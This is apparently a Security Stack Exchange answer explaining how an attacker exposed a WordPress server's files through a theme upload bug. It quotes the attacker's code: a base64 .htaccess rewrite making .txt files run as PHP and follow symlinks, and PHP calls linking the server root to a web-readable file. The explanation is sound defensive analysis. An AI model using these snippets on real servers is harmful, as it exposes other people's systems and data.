How did the hacker get access to my WordPress upload folder?
https://security.stackexchange.com/questions/96000/how-did-the-hacker-get-access-to-my-wordpress-upload-folder
Once the file is uploaded to the server (exploiting a bug in a wordpress theme), the .htaccess
is reconfigured in a way that any .txt
file will be interpreted by the server as a .php
script and it will follow symlinks.
The next step is the trick, he makes a symlink from /
to Donnazmi.txt
(2 ways)
The code isn't really complex, it prints an html form with the needed configs to run the exploit steps (you need to send a post request with Donnazmi
as a post key to see it).
Code explained:
.htaccess
reconfig:
$fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
This is a base64 encoded string, which translates into:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
So with that config:
$file = fopen(".htaccess","w+"); // open the file
$write = fwrite ($file ,base64_decode($fvckem));
// write the new config inside the file
Symlinks:
// 1. this is a link with the linux comand `ln`
system('ln -s / Donnazmi.txt');
// 2. this is a link php native function
$Donnazmi = symlink("/","Donnazmi.txt");
After the execution, each time he visits example.com/Donnazmi.txt he sees a list of the root directory of your server (Options Indexes
tm).
So yes rebuild that machine. and check the software before installing it.
The video that I found was the first thing to come up when I googled the hacker's name.
Do you have WordPress Cold Fusion theme installed by any chance?
Here is the so called Mauritania Attacker's video on explaining how he exploits the specific WordPress theme to upload files on server.